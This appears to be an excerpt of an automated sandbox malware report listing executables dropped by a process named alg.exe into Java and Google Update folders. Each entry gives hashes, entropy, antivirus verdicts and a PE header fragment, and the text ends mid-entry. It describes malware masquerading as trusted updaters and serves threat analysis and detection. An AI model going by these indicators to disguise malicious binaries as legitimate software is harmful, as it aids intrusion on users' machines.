                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:A0vHymLj8trn3wsq/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Blj4rgsqLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:E5D374EDFD095DF7A4B1BB8CA8EDEC51
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:FBBB997878A6BFEF7F5F33483B966386A7260BCF
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:31B3050433166DC90EDFDA4568AD3E04125FB3B7F020327EC291E34C6E34B392
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:67B1CAFB282A90B6E9010AF7B40F0C5A406F4001FEF02B0C11077394AD3DB5C959045300FDED43E1642399A796A4BC3B2A2EB4268A409234532CF92F007C4169
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................p&.....R.......................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1781760
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.273995845458764
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:N4i0wGJra0uAUfkVy7/ZTLNiXicJFFRGNzj3:NN0wGJrakUQy17wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:4FA8A73B5D45AC3C4905698DE5BEC59F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:CBD587BCFD22EF8D5FDF12D1B27C0AB4CDECE130
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:B32C632C903FDC55653A1EC1CA1D9AE9E054FB7C0373AFA12FA780227574F4F8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:257CBC674AE54091062F659846597792DBE2E89B56D3F5733583B832381A6740E8758D45E44C227D9E66D6342001E628E6800EC3E637414CDEEE3CD0B14E92C0
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.............................................................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1318400
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.441620675796441
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:UeR0gB6axoCf0R6RLQRF/TzJqe58Bimk/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ggHxmR6uBTzge5MimkLNiXicJFFRGNzb
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:7899DADE23765DC3A0D9172B66D18702
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:320A80A274C992BF984E980E4CE237979EE68E59
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:656FD9D231B1BC59D5FCCA3628EADB1083F86EFCC742BC5B9BC7C6B72F1F4BA9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:D6E18409C52F3BE3015EC2427ADCEA5B8F9D91A456A295BFD494308843FDA1634A562692A01C7CD2E2D07D532019351A114C44E0CEB2A878FA7ACD9D60829527
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`......<.......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1530880
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.999596356542499
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:5cwOtO7a/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5hOtmaLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:C64B96CF022411D65428FBA83100049E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:2C133F1A63597A40BFC2CFB4190EB9299A628348
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:3378A825C807B5EE33005A011982FB92D115FE38BCD5E6FF75E62DD26342C2D1
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:28B11B32C2699502B0065884A95DFCA6FE8F05D21AB9001322BA0099102FDAEC092844092B9B94844DB3BB9893972669058E9D1EAA5B232DC318F57310D1E0FE
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................P"......e.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1530880
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.000284223187745
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:XfU/h/4K5/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:XM/V5LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:1C50055EAC87F35B291CC878FFA663BF
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:AAA13047F5C053293ECAB58C2AE1D348468B94D2
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:3FDAB63663D2FE546913176D0D1C69E026DDE8BC9E76F86969A7C77ABA9C7BD4
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:3B7B587573BCF72821C018A3D157AE8973B1E0194D9117F8599EF641116787B286C26BA8E26FD18567A4C518AA48EE1A424C3FF108E953E79D6D2CFAF4F6D3C5
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................P".....x........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1669632
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.073475086989371
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:4x7NiBLZ05jNTmJWEx2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:4xZiHIjNg2LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:92F06AAF0D204AAA57D958A1BEF8A9BA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:A4AC54119BFFE764B7DB3CCA114A82DBD4B94FF0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:603C8611F04F0284A108EFF86DDF82E9422D4EFB1E09BB35E8DCD0F97FA04673
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:7EF2983CADEC4F67D8189DA3C516645BC9198A638345A91C23A83016D64EE1F3ABE3C197D691CA252EA51EBC32F425A68571BC286873D44024BE1D05AB172F9E
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@...........................%......y..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1574912
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.031916863270955
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:3lnRkl46fgJcEwixs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:LoJfgJcEwCsLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:AF4C5EBBD70AB32C8FC6D60AFA9ADC25
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:C132D3223AFF2FC450102D6CAD508CCEDDC2E79A
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:00109BA3D5AEEC93B07EF244F1F2A74733F96AA9C34B9406F7D9C504BB6BB7CE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:23979315B8C3B2C3DE87CC4AF121A36C22D0AF3FB5513AC9B885CF2734CD3FA49644FCABB96A7BE101CD9D33E856E5886484ADB55862D42ECEF9E09F5188452F
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@...........................#.....v.......................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...............H..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1677824
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.088240688205662
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:HW+5k8hb0Haw+x8/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:HWKk8SHawm8LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:BB2264D7B3B19E9AB3DEB060B6B9F671
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:914D22DE62F7D6324A389ADD7BB09452E59A0F97
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:CC6EC05A87FD52E38B9D8F506E1FAA1BB76747AAEBAF5F693A3F8723AE576CF9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:54526A713EF33C6C317628237DB8FA4F0F0B7FDE80CDD587100661C420EC7129D3467870663C99C182EFAA46A9D33D421797A312DC58FBB8784AB71511A25594
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@..............................$.....6..... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...p...`......................@...........................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1437696
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.706146408444249
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:rLCKABU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ruKkULNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:7AF52197AE18101D233E16E96AFCFD9F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:3C005D462F9B3B809E1F9DAEE79C8CB69F6B9C79
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:C62FA9E8D5EFE5D3880CA020988C88FE2DFC82E78F13E8C5E7BFA1C5D3A494EA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:AEDFB936E64F0095789BB8CFE80A791E23B8652808D160DD15E79401DFE573BE247E6D101A599BEF0F5A2337FA972B31FD83062B6AD288DD410DF1FA292A4972
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@........................... .....R.......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...p...........@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1383936
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686262008335994
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:EjNWBPX/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:2NmvLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:DB6448D3D45177B6254C26D8CEBBC6C7
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:4FE4ECA91EFA9DDB32AD33EC8FD4C04C25224A41
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:E5CF1578439947E381BFE2BEBD5CE5566B1C29CD6FA02E035245201B3FA1A2C3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:D287C5E93DF018E4917BA429CD0E6D55E751CF2650B8159A3257567E2B37E441FD81709A11974FCB5210A3DB292ED2D1F13644132080D8FC8AC4A17B1869D7D4
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@........................... ..............................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...p...........n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1458176
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.782563019074003
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:+i5RyhdsRrN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:+i5soRNLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:9D25A357424F91D3BA652745DE98EEF3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:F3D2D00349421F209E8A57A7D0BD64058AB8305E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:BE384B6DE81CA30EBC7835A64053EA4BD34BCA1F24B26E9C687F7A05580DF15C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:481DA03FE00C22DA07F46CD092B6ADE92A23E38EB2BE975C786528E4DEC9B7C89383A79169D7943D0A03B1411AF0A75DC7360AF4B349A4CCD4589AE7BE8CF989
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@..............................!......!.... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...`... ......................@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1498112
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.900296431328439
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:61qDmRF+wpx/QafC/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:tmRF+wn/JfCLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:594E4AC9B0890226C648B655FDF1597C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:82253319E522BAD28B5F4C9DF230D47A20B76864
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:0374147CCD5AF5AA58C17B5E29434A11A8556D610130CA00FB9959C452B7507C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:AC8044B331A0B2CD4B10573B1C776A0463B1C133048AAC3BBAB7FB4D768CEB2C3677456D0393AA163F7B95CBAA19ACCFF4A312062CE9672073C3B91C15276037
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@...........................!.....y................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc.......p......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1383936
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686230355719929
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:rE21BPI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:I2bwLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:1112434E1D4F976E7B3372D792A39FF5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:9DF050A49CF189638AC0F0D449C62548BDCA65D3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:C32575868523FF9A7DDA4823C65E1DB1DD790FEECD0F01B7AD80E91294E4C36F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:D179C32A133F1C889374061A5D5DDF43780822C62AF084E0D23AE6F269D8F8A6D80EDF6E1262DB249B5B5F7A5287AF9A7DBC03B237D8F7437FC1224EA4FE322A
